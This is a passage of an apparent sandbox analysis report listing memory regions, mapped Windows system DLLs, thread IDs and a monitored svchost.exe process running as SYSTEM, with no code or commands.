monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012e0000" filename = "" Region: id = 2689 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 2690 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 2691 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2692 start_va = 0x1f0000 end_va = 0x20ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 2694 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 2695 start_va = 0x390000 end_va = 0x3affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 2696 start_va = 0x3b0000 end_va = 0x3b7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 2697 start_va = 0x7fefc2c0000 end_va = 0x7fefc36bfff monitored = 0 entry_point = 0x7fefc2d6acc region_type = mapped_file name = "audiosrv.dll" filename = "\\Windows\\System32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll") Region: id = 2699 start_va = 0x7fefc290000 end_va = 0x7fefc2bbfff monitored = 0 entry_point = 0x7fefc2915c4 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2700 start_va = 0x7fefdd60000 end_va = 0x7fefdf36fff monitored = 0 entry_point = 0x7fefdd61010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 2701 start_va = 0x7fefda40000 end_va = 0x7fefda75fff monitored = 0 entry_point = 0x7fefda41474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2702 start_va = 0x7feff1a0000 end_va = 0x7feff276fff monitored = 0 entry_point = 0x7feff1a3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2703 start_va = 0x7fefd970000 end_va = 0x7fefd989fff monitored = 0 entry_point = 0x7fefd971558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 2704 start_va = 0x7fefc240000 end_va = 0x7fefc28afff monitored = 0 entry_point = 0x7fefc24efcc region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 2705 start_va = 0x7fefc110000 end_va = 0x7fefc23bfff monitored = 0 entry_point = 0x7fefc1194bc region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2706 start_va = 0x7fefc390000 end_va = 0x7fefc398fff monitored = 0 entry_point = 0x7fefc391010 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 2707 start_va = 0xe0000 end_va = 0xecfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 2708 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2709 start_va = 0x1450000 end_va = 0x14cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001450000" filename = "" Region: id = 2710 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 2711 start_va = 0x7feffbe0000 end_va = 0x7feffc78fff monitored = 0 entry_point = 0x7feffbe1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2712 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 2713 start_va = 0x12a0000 end_va = 0x131ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012a0000" filename = "" Region: id = 2714 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 2715 start_va = 0xff8a0000 end_va = 0xff8c3fff monitored = 0 entry_point = 0xff8b69b4 region_type = mapped_file name = "audiodg.exe" filename = "\\Windows\\System32\\audiodg.exe" (normalized: "c:\\windows\\system32\\audiodg.exe") Region: id = 2742 start_va = 0x9d0000 end_va = 0xa1bfff monitored = 0 entry_point = 0xa1506c region_type = mapped_file name = "fltmgr.sys" filename = "\\Windows\\System32\\drivers\\fltMgr.sys" (normalized: "c:\\windows\\system32\\drivers\\fltmgr.sys") Region: id = 2745 start_va = 0x420000 end_va = 0x420fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 2746 start_va = 0x15a0000 end_va = 0x161ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015a0000" filename = "" Region: id = 2747 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 2748 start_va = 0x7ff709e0000 end_va = 0x7ff709f3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pshed.dll" filename = "\\Windows\\System32\\PSHED.DLL" (normalized: "c:\\windows\\system32\\pshed.dll") Region: id = 2753 start_va = 0x420000 end_va = 0x420fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 2754 start_va = 0x420000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 2755 start_va = 0x1320000 end_va = 0x141ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001320000" filename = "" Region: id = 2764 start_va = 0x75670000 end_va = 0x7567dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-kernel-power-events.dll" filename = "\\Windows\\System32\\microsoft-windows-kernel-power-events.dll" (normalized: "c:\\windows\\system32\\microsoft-windows-kernel-power-events.dll") Region: id = 2765 start_va = 0x75670000 end_va = 0x75676fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-kernel-processor-power-events.dll" filename = "\\Windows\\System32\\microsoft-windows-kernel-processor-power-events.dll" (normalized: "c:\\windows\\system32\\microsoft-windows-kernel-processor-power-events.dll") Region: id = 2775 start_va = 0x8b0000 end_va = 0x8b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008b0000" filename = "" Region: id = 2776 start_va = 0x8c0000 end_va = 0x8c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008c0000" filename = "" Region: id = 2777 start_va = 0x1510000 end_va = 0x158ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001510000" filename = "" Region: id = 2778 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 2781 start_va = 0x755d0000 end_va = 0x75678fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "adtschema.dll" filename = "\\Windows\\System32\\adtschema.dll" (normalized: "c:\\windows\\system32\\adtschema.dll") Region: id = 2788 start_va = 0x1740000 end_va = 0x17bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001740000" filename = "" Region: id = 2789 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 2796 start_va = 0x8d0000 end_va = 0x8d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 2831 start_va = 0xffaf0000 end_va = 0xffb42fff monitored = 0 entry_point = 0xffb03310 region_type = mapped_file name = "services.exe" filename = "\\Windows\\System32\\services.exe" (normalized: "c:\\windows\\system32\\services.exe") Region: id = 2832 start_va = 0x7fefccd0000 end_va = 0x7fefcd36fff monitored = 0 entry_point = 0x7fefccdd320 region_type = mapped_file name = "umpnpmgr.dll" filename = "\\Windows\\System32\\umpnpmgr.dll" (normalized: "c:\\windows\\system32\\umpnpmgr.dll") Region: id = 2833 start_va = 0x17c0000 end_va = 0x19bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000017c0000" filename = "" Region: id = 2985 start_va = 0x7fefd880000 end_va = 0x7fefd8bcfff monitored = 0 entry_point = 0x7fefd8818f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 3154 start_va = 0x7fefb6b0000 end_va = 0x7fefb771fff monitored = 0 entry_point = 0x7fefb6b101c region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 3158 start_va = 0x7fefb620000 end_va = 0x7fefb656fff monitored = 0 entry_point = 0x7fefb628424 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 3159 start_va = 0x7fefb780000 end_va = 0x7fefb82bfff monitored = 0 entry_point = 0x7fefb7918d0 region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll") Region: id = 3160 start_va = 0x7fefb780000 end_va = 0x7fefb82bfff monitored = 0 entry_point = 0x7fefb7918d0 region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll") Region: id = 3172 start_va = 0x741e0000 end_va = 0x7431dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "comres.dll" filename = "\\Windows\\System32\\comres.dll" (normalized: "c:\\windows\\system32\\comres.dll") Region: id = 3187 start_va = 0xfe0000 end_va = 0x105ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fe0000" filename = "" Region: id = 3188 start_va = 0x7fefb340000 end_va = 0x7fefb347fff monitored = 0 entry_point = 0x7fefb34284c region_type = mapped_file name = "nrpsrv.dll" filename = "\\Windows\\System32\\nrpsrv.dll" (normalized: "c:\\windows\\system32\\nrpsrv.dll") Region: id = 3189 start_va = 0x7fefb360000 end_va = 0x7fefb369fff monitored = 0 entry_point = 0x7fefb361adc region_type = mapped_file name = "lmhsvc.dll" filename = "\\Windows\\System32\\lmhsvc.dll" (normalized: "c:\\windows\\system32\\lmhsvc.dll") Region: id = 3190 start_va = 0x7fefb3a0000 end_va = 0x7fefb3aafff monitored = 0 entry_point = 0x7fefb3a1198 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 3191 start_va = 0x7fefb3b0000 end_va = 0x7fefb3d6fff monitored = 0 entry_point = 0x7fefb3b98bc region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 3192 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 3236 start_va = 0x1630000 end_va = 0x16affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001630000" filename = "" Region: id = 3237 start_va = 0xff2c0000 end_va = 0xff321fff monitored = 0 entry_point = 0xff2d08d8 region_type = mapped_file name = "winlogon.exe" filename = "\\Windows\\System32\\winlogon.exe" (normalized: "c:\\windows\\system32\\winlogon.exe") Region: id = 3238 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 3252 start_va = 0x1430000 end_va = 0x14affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001430000" filename = "" Region: id = 3253 start_va = 0x7fefb2e0000 end_va = 0x7fefb330fff monitored = 0 entry_point = 0x7fefb2ef6c0 region_type = mapped_file name = "dhcpcore.dll" filename = "\\Windows\\System32\\dhcpcore.dll" (normalized: "c:\\windows\\system32\\dhcpcore.dll") Region: id = 3254 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 3256 start_va = 0x7fefcfd0000 end_va = 0x7fefd02afff monitored = 0 entry_point = 0x7fefcfd6940 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 3257 start_va = 0x19c0000 end_va = 0x1afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000019c0000" filename = "" Region: id = 3310 start_va = 0x7fefca90000 end_va = 0x7fefcb4afff monitored = 0 entry_point = 0x7fefca96de0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 3311 start_va = 0x7fefca80000 end_va = 0x7fefca8bfff monitored = 0 entry_point = 0x7fefca81064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 3332 start_va = 0x7fefb210000 end_va = 0x7fefb24afff monitored = 0 entry_point = 0x7fefb214520 region_type = mapped_file name = "dhcpcore6.dll" filename = "\\Windows\\System32\\dhcpcore6.dll" (normalized: "c:\\windows\\system32\\dhcpcore6.dll") Region: id = 3342 start_va = 0x1b00000 end_va = 0x1b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b00000" filename = "" Region: id = 3343 start_va = 0x7fffff98000 end_va = 0x7fffff99fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 3345 start_va = 0x1220000 end_va = 0x129ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001220000" filename = "" Region: id = 3346 start_va = 0x1c80000 end_va = 0x1cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c80000" filename = "" Region: id = 3347 start_va = 0x7fffff94000 end_va = 0x7fffff95fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 3348 start_va = 0x7fffff96000 end_va = 0x7fffff97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 3362 start_va = 0x7fefb140000 end_va = 0x7fefb150fff monitored = 0 entry_point = 0x7fefb1416ac region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 3370 start_va = 0x7fefb0c0000 end_va = 0x7fefb0d7fff monitored = 0 entry_point = 0x7fefb0c1bf8 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 3372 start_va = 0x8e0000 end_va = 0x8e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008e0000" filename = "" Region: id = 3438 start_va = 0xff2c0000 end_va = 0xff321fff monitored = 0 entry_point = 0xff2d08d8 region_type = mapped_file name = "winlogon.exe" filename = "\\Windows\\System32\\winlogon.exe" (normalized: "c:\\windows\\system32\\winlogon.exe") Region: id = 3439 start_va = 0xff3c0000 end_va = 0xff416fff monitored = 0 entry_point = 0xff3d3450 region_type = mapped_file name = "lsm.exe" filename = "\\Windows\\System32\\lsm.exe" (normalized: "c:\\windows\\system32\\lsm.exe") Region: id = 3745 start_va = 0x1bc0000 end_va = 0x1c3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001bc0000" filename = "" Region: id = 3746 start_va = 0x390000 end_va = 0x390fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 3747 start_va = 0x390000 end_va = 0x3affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 3779 start_va = 0x1c40000 end_va = 0x203ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c40000" filename = "" Region: id = 3959 start_va = 0x420000 end_va = 0x420fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 3960 start_va = 0x2070000 end_va = 0x20effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002070000" filename = "" Region: id = 3961 start_va = 0x420000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 3963 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 3964 start_va = 0x16b0000 end_va = 0x172ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000016b0000" filename = "" Region: id = 3965 start_va = 0x1f0000 end_va = 0x20ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 3977 start_va = 0x390000 end_va = 0x390fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 3978 start_va = 0x1160000 end_va = 0x11dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001160000" filename = "" Region: id = 3979 start_va = 0x390000 end_va = 0x3affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 3981 start_va = 0x420000 end_va = 0x420fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 3982 start_va = 0x20e0000 end_va = 0x215ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020e0000" filename = "" Region: id = 3983 start_va = 0x420000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 3984 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 3985 start_va = 0x2210000 end_va = 0x228ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002210000" filename = "" Region: id = 3986 start_va = 0x1f0000 end_va = 0x20ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 4122 start_va = 0x7fef8fb0000 end_va = 0x7fef8ffdfff monitored = 0 entry_point = 0x7fef8fc46e0 region_type = mapped_file name = "nlasvc.dll" filename = "\\Windows\\System32\\nlasvc.dll" (normalized: "c:\\windows\\system32\\nlasvc.dll") Region: id = 4123 start_va = 0x8e0000 end_va = 0x8e2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "nlasvc.dll.mui" filename = "\\Windows\\System32\\en-US\\nlasvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\nlasvc.dll.mui") Region: id = 4125 start_va = 0x7fef8fe0000 end_va = 0x7fef8ff4fff monitored = 0 entry_point = 0x7fef8fe12a0 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 4126 start_va = 0x8e0000 end_va = 0x8e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "napinsp.dll.mui" filename = "\\Windows\\System32\\en-US\\napinsp.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\napinsp.dll.mui") Region: id = 4127 start_va = 0x7fef8fe0000 end_va = 0x7fef8ff8fff monitored = 0 entry_point = 0x7fef8fe177c region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 4128 start_va = 0x8e0000 end_va = 0x8e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pnrpnsp.dll.mui" filename = "\\Windows\\System32\\en-US\\pnrpnsp.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\pnrpnsp.dll.mui") Region: id = 4129 start_va = 0x7fef8fc0000 end_va = 0x7fef8fd8fff monitored = 0 entry_point = 0x7fef8fc177c region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 4130 start_va = 0x8e0000 end_va = 0x8e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pnrpnsp.dll.mui" filename = "\\Windows\\System32\\en-US\\pnrpnsp.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\pnrpnsp.dll.mui") Region: id = 4131 start_va = 0x8e0000 end_va = 0x8e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshtcpip.dll.mui" filename = "\\Windows\\System32\\en-US\\wshtcpip.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshtcpip.dll.mui") Region: id = 4138 start_va = 0x7fefb690000 end_va = 0x7fefb6a4fff monitored = 0 entry_point = 0x7fefb6960d8 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 4139 start_va = 0x2290000 end_va = 0x239ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002290000" filename = "" Region: id = 4140 start_va = 0x19c0000 end_va = 0x1a6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000019c0000" filename = "" Region: id = 4141 start_va = 0x1a80000 end_va = 0x1afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a80000" filename = "" Region: id = 4142 start_va = 0x7fef8fc0000 end_va = 0x7fef8fd4fff monitored = 0 entry_point = 0x7fef8fc12a0 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 4143 start_va = 0x7fef8fe0000 end_va = 0x7fef8ff8fff monitored = 0 entry_point = 0x7fef8fe177c region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 4144 start_va = 0x7fefb250000 end_va = 0x7fefb2a2fff monitored = 0 entry_point = 0x7fefb252b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4145 start_va = 0x1b80000 end_va = 0x1c2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b80000" filename = "" Region: id = 4146 start_va = 0x7fefab20000 end_va = 0x7fefab27fff monitored = 0 entry_point = 0x7fefab21414 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 4150 start_va = 0x7fef8fb0000 end_va = 0x7fef8fbafff monitored = 0 entry_point = 0x7fef8fb12e0 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 4341 start_va = 0x7fef8170000 end_va = 0x7fef8178fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winmgmtr.dll" filename = "\\Windows\\System32\\wbem\\WinMgmtR.dll" (normalized: "c:\\windows\\system32\\wbem\\winmgmtr.dll") Region: id = 4343 start_va = 0x74300000 end_va = 0x74306fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "aeevts.dll" filename = "\\Windows\\System32\\aeevts.dll" (normalized: "c:\\windows\\system32\\aeevts.dll") Region: id = 4778 start_va = 0x7fef94b0000 end_va = 0x7fef9523fff monitored = 0 entry_point = 0x7fef94b66f0 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 4784 start_va = 0x7fef7310000 end_va = 0x7fef732cfff monitored = 0 entry_point = 0x7fef7311a28 region_type = mapped_file name = "radardt.dll" filename = "\\Windows\\System32\\radardt.dll" (normalized: "c:\\windows\\system32\\radardt.dll") Region: id = 5020 start_va = 0x10e0000 end_va = 0x1141fff monitored = 0 entry_point = 0x10f08d8 region_type = mapped_file name = "winlogon.exe" filename = "\\Windows\\System32\\winlogon.exe" (normalized: "c:\\windows\\system32\\winlogon.exe") Region: id = 5021 start_va = 0x22f0000 end_va = 0x236ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022f0000" filename = "" Region: id = 5022 start_va = 0x2390000 end_va = 0x239ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002390000" filename = "" Region: id = 5023 start_va = 0x7fefabc0000 end_va = 0x7fefac8dfff monitored = 0 entry_point = 0x7fefabc1e18 region_type = mapped_file name = "mpssvc.dll" filename = "\\Windows\\System32\\MPSSVC.dll" (normalized: "c:\\windows\\system32\\mpssvc.dll") Region: id = 5024 start_va = 0x7fffff96000 end_va = 0x7fffff97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Thread: id = 289 os_tid = 0x2a4 Thread: id = 290 os_tid = 0x2bc Thread: id = 291 os_tid = 0x2cc Thread: id = 292 os_tid = 0x2d8 Thread: id = 293 os_tid = 0x2dc Thread: id = 294 os_tid = 0x2e8 Thread: id = 295 os_tid = 0x2f0 Thread: id = 307 os_tid = 0x330 Thread: id = 311 os_tid = 0x340 Thread: id = 312 os_tid = 0x344 Thread: id = 325 os_tid = 0x36c Thread: id = 326 os_tid = 0x370 Thread: id = 327 os_tid = 0x374 Thread: id = 328 os_tid = 0x378 Thread: id = 330 os_tid = 0x384 Thread: id = 332 os_tid = 0x38c Thread: id = 334 os_tid = 0x394 Thread: id = 363 os_tid = 0x13c Thread: id = 366 os_tid = 0x16c Thread: id = 369 os_tid = 0x1b4 Thread: id = 382 os_tid = 0xe0 Thread: id = 383 os_tid = 0x11c Thread: id = 384 os_tid = 0x3e4 Thread: id = 432 os_tid = 0x4c8 Thread: id = 444 os_tid = 0x510 Thread: id = 445 os_tid = 0x514 Thread: id = 446 os_tid = 0x518 Thread: id = 447 os_tid = 0x51c Thread: id = 448 os_tid = 0x520 Thread: id = 544 os_tid = 0x6c8 Process: id = "11" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x280a2000" os_pid = "0x2f8" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0x1c0" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AudioEndpointBuilder" [0xe], "NT SERVICE\\CscService" [0xa], "NT SERVICE\\dot3svc" [0xa], "NT SERVICE\\hidserv" [0xa], "NT SERVICE\\HomeGroupListener" [0xa], "NT SERVICE\\IPBusEnum" [0xa], "NT SERVICE\\Netman" [0xa], "NT SERVICE\\PcaSvc" [0xa], "NT SERVICE\\StorSvc" [0xa], "NT SERVICE\\TabletInputService" [0xa], "NT SERVICE\\TrkWks" [0xa], "NT SERVICE\\UmRdpService" [0xa], "NT SERVICE\\UxSms" [0xa], "NT SERVICE\\WdiSystemHost" [0xa], "NT SERVICE\\Wlansvc" [0xa], "NT SERVICE\\WPDBusEnum" [0xa], "NT SERVICE\\wudfsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d65f" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 2330 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2331 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2332 start_va = 0x170000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 2333 start_va = 0x77970000 end_va = 0x77b18fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2334 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 2335 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2336 start_va = 0xffce0000 end_va = 0xffceafff monitored 